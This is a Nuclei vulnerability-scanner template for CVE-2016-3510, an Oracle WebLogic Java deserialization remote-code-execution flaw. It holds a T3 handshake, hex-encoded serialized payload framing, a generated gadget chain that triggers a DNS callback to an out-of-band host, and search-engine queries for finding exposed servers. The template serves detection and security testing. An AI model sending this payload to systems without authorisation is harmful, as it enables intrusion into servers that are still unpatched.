daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/network/cves/2016/CVE-2016-3510.yaml

65 lines
4.5 KiB
YAML
Raw Blame History

id: CVE-2016-3510
info:
name: Oracle WebLogic Server Java Object Deserialization - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to WLS Core Components, a different vulnerability than CVE-2016-3586.
remediation: |
Install the relevant patch as per the advisory provided in the Oracle Critical Patch Update for July 2016.
reference:
- https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/weblogic.py
- http://packetstormsecurity.com/files/152324/Oracle-Weblogic-Server-Deserialization-MarshalledObject-Remote-Code-Execution.html
- http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
- http://www.securitytracker.com/id/1036373
- https://www.tenable.com/security/research/tra-2016-21
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2016-3510
cwe-id: CWE-119
epss-score: 0.04407
epss-percentile: 0.92379
cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: oracle
product: weblogic_server
shodan-query:
- product:"oracle weblogic"
- http.title:"oracle peoplesoft sign-in"
fofa-query: title="oracle peoplesoft sign-in"
google-query: intitle:"oracle peoplesoft sign-in"
tags: packetstorm,cve,cve2016,oracle,weblogic,t3,rce,oast,deserialization,network,tcp
variables:
start: "016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e64383f42a6d92c9e9af0f9472027973720078720178720278700000000c00000002000000000000000000000001007070707070700000000c00000002000000000000000000000001007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000"
end: "fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200074900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870774621000000000000000000093132372e302e312e31000b75732d6c2d627265656e73a53caff10000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff0078fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870771d018140128134bf427600093132372e302e312e31a53caff1000000000078"
tcp:
- inputs:
- data: "t3 12.2.1
AS:255
HL:19
MS:10000000
PU:t3://us-l-breens:7001
\n"
read: 1024
- data: "{{hex_decode(concat('00000460',start,generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex'),end))}}"
host:
- "{{Hostname}}"
- "{{Host}}:7001"
read-size: 4
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
# digest: 4b0a004830460221008d2606c39e5ea4351864ef8062f319aec1821364ae05e12d4a6867a0849c930e022100c7edf99ab68a3c8ede7cbdecae0b8d1516e23763e7df36b3baf2418063aa343b:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink